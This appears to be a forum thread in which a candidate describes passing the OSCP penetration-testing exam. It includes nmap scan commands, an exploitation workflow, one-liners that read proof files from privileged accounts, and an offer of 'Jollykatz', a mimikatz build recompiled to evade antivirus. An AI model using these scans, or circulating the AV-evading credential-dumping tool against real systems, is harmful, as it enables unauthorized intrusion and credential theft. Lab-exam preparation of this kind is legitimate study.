Scanning the machines took a fair bit of time. To the point I was getting a bit anxious about the duration of the scans. I chose to run top 1000 port scans on two of the machines, and the full 1-65535 on the other machines. This worked out well as I could work on the two machines while my other scans ran in the background. The first machine fell within 2 hours. Another fell 2 hours later. After 10 hours of being in the exam, all machines had fallen.

I stuck to my well-rehearsed approach that I perfected in the labs and it paid off.

The approach I used in the labs and in the exam was as follows:

  1. Revert the machine you are about to attack (not required in the exam)
  2. Run single machine port scans on the machines you are attacking:
    • Single host TCP scan:
      nmap -Pn -sS --stats-every 3m --max-retries 1 --max-scan-delay 20 --defeat-rst-ratelimit -T4 -p1-65535 -oA /root/192_168_15_201T 192.168.15.201
    • Single host UDP scan:
      nmap -Pn --top-ports 1000 -sU --stats-every 3m --max-retries 1 -T3 -oA /root/192_168_15_201U 192.168.15.201
    • Detailed single host TCP scan:
      nmap -nvv -Pn -sSV -T1 -p$(cat /root/192_168_15_201T.xml | grep portid | grep protocol=\"tcp\" | cut -d'"' -f4 | paste -sd "," -) --version-intensity 9 -A -oA /root/192_168_15_201T_DETAILED 192.168.15.201
  3. Analyze the port scan results. Some ports might stand out (you will learn in the labs which ports stand out and why).
  4. Detailed port attacks. You will learn in the labs which work best for you.
    • nikto and dirb for webservers
    • nmap smb-check-vulns script and enum4linux for samba and CIFS services
    • etc
  5. Kali “searchsploit” with the service/software version of each port.
  6. Exploit the vulnerability you found with searchsploit to gain a limited or root shell
  7. If limited shell then use the linux or windows exploit suggesters, “searchsploit kernel x.x” and search for common weaknesses in the software.

I have used a lot of websites during my OSCP to gain experience, but there are some websites that stand out in this respect and which I came back to time and time again: hashkiller, rebootuser pages 1758 and 1721 for linux, and fuzzysecurity tutorial 16 for windows.

After having owned all machines in the exam, I went through the documentation and updated as much as I could. After I had updated the documentation in KeepNote, I reverted the machines and used the notes step-by-step to own the clean machines again. I learnt to do this in the labs, and one might be surprised how poor one’s notes can be when doing this. I always find issues with the notes after doing clean machines. If I find lots of discrepancies, I will revert the machine again, and redo them a last time, until every command in the notes matches with results in the real exam. This way, I keep my notes accurate and to the point. I copy/paste the text from the terminal into my notes. I only take a single screenshot of the machine, which I do at the very end of taking notes. This keeps notes clean and to the point, it also keeps my notes reusable because I can copy/paste commands. I have frequently re-used portions of an exploit on one machine onto another in this manner.

The screenshot has the following information, taken from a shell with root/system privileges: proofs - Pastebin.com

echo " ";echo "uname -a:";uname -a;echo " ";echo "hostname:";hostname;echo " ";echo "id";id;echo " ";echo "ifconfig:";/sbin/ifconfig -a;echo " ";echo "proof:";cat /root/proof.txt 2>/dev/null; cat /Desktop/proof.txt 2>/dev/null;echo " "

echo. & echo. & echo whoami: & whoami 2> nul & echo %username% 2> nul & echo. & echo Hostname: & hostname & echo. & ipconfig /all & echo. & echo proof.txt: & type "C:\Users\Administrator\Desktop\proof.txt" 2> nul & type "C:\Documents and Settings\Administrator\Desktop\proof.txt" 2> nul & type %USERPROFILE%\Desktop\proof.txt 2> nul

I have read about people writing 300+ page exam reports, but I wanted to keep the report realistic and uncluttered. My final report was just 28 pages, which included a table in an annex which listed each of the lab machines’ IP address, proof.txt value and a short (10 words or less) description of how access was performed.

The exam report took about 5 hours to write. I reviewed the report at least 3 times before emailing it to the email address in the exam notes. I’m pretty confident I passed, having done 100% of the lab machines and 100% of the exam machines. I’ll have to wait for the email confirmation to be sure though!
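The detailed TCP scan in the approach listed above builds its -p list by grepping the first scan’s XML for every tcp portid, which also picks up ports nmap recorded as closed or filtered. As an added example (not part of the original post), this Python version reads the same XML by structure and keeps only open ports, grouped per host; the sample XML and the function names are constructed for illustration.

```python
import xml.etree.ElementTree as ET

# Constructed sample in the layout of nmap's XML output (not real scan data).
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="constructed sample">
  <host>
    <address addr="192.168.15.201" addrtype="ipv4"/>
    <ports>
      <extraports state="filtered" count="65530"/>
      <port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/></port>
      <port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/></port>
      <port protocol="tcp" portid="113"><state state="closed" reason="reset"/></port>
      <port protocol="tcp" portid="445"><state state="open" reason="syn-ack"/></port>
      <port protocol="udp" portid="161"><state state="open|filtered" reason="no-response"/></port>
    </ports>
  </host>
</nmaprun>
"""


def ports_by_host(xml_text, protocol="tcp", wanted_state="open"):
    """Return {address: sorted [port, ...]} for ports in the wanted state."""
    root = ET.fromstring(xml_text)
    result = {}
    for host in root.iter("host"):
        # Prefer the IPv4 address; fall back to whatever address is recorded.
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:
            addr_el = host.find("address")
        if addr_el is None:
            continue
        ports = []
        for port in host.iter("port"):
            state = port.find("state")
            if port.get("protocol") != protocol or state is None:
                continue
            # A plain grep on "portid" would keep port 113 (closed) as well.
            if state.get("state") == wanted_state:
                ports.append(int(port.get("portid")))
        result[addr_el.get("addr")] = sorted(ports)
    return result


def port_argument(ports):
    """Join ports into the comma-separated form nmap's -p option takes."""
    return ",".join(str(p) for p in ports)


if __name__ == "__main__":
    for addr, ports in ports_by_host(SAMPLE_XML).items():
        print(addr, port_argument(ports))
```

Keeping the result keyed by host also keeps the port lists separate when one XML file covers several machines.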

Thanks guys! Got my email today, I passed! I’ll do some sorting of my notes over the next few days and will post tools and helpers I used.

I’ve sorted out the scripts from the spoilers and there are two scripts left. All other scripts somehow relate to machines or vulns that would prove too much of a spoiler.

My rootloot.bat script for windows: [Winbatch] Jollyfrogs-batch - Pastebin.com

Jollykatz: it’s simply a recompiled mimikatz with some changed parameters that makes it undetected to most AV. Usual T&C’s apply, use with care. http://www.filedropper.com/jollykatz

I’m currently undecided on whether to progress to OSCE or CISM. If I decide to go for OSCE I will create a new OSCE thread in this forum.

Hi Kane,

Didn’t realize it had a password on it, I usually password protect my files to prevent AV from reading them and deleting them.

The password is “infected”. (the file is not infected, it’s just my standard password for anything OSCP related which could potentially be picked up (now or in future) as malware, so I don’t accidentally copy or use it on production PCs).

Hi Muggie,

I wrote such a script but if you follow the course, you will be able to write one yourself. You will learn more if you write these scripts yourself and once you have written one, and understand how it works (start small, like this script) you can reuse code for other scripts. If you are totally lost on where to start, check out the patator python script as a start, it’s a pretty large script but you can butcher it and tailor to your needs.

[Quote] Originally Posted by Mooseboost

You know, I have not seen Jolly around in some time. I wonder what they moved on to after owning the OSCP?

I’m still around but haven’t had much time due to work commitments. I’m doing SLAE now, in preparation for OSCE. I posted a new post today on my progress with SLAE!

Every once in a while someone emails me, they typically ask if I’m still alive (I am!). After OSCP I’ve been busy with SLAE and OSCE, and I’m currently studying the SecurityTube Forensics course and the SANS course GXPN, as well as doing research on two (red team) topics.

I saw the jollykatz files timed out on the original upload location, and TE doesn’t allow uploading the zip file (probably because it contains .exe files), so I’ve uploaded them to this permanent location. The jollykatz_xp is compiled slightly differently, so if the other version doesn’t work, the XP version might (specifically on Windows XP service pack 0 machines). The zip file has no password, and I’ve just scanned all 4 files with Avast and all files are still FUD.


Please note: jollykatz is just a simple recompilation of the mimikatz tool with the aim to make it FUD. All credit goes to the creator of Mimikatz.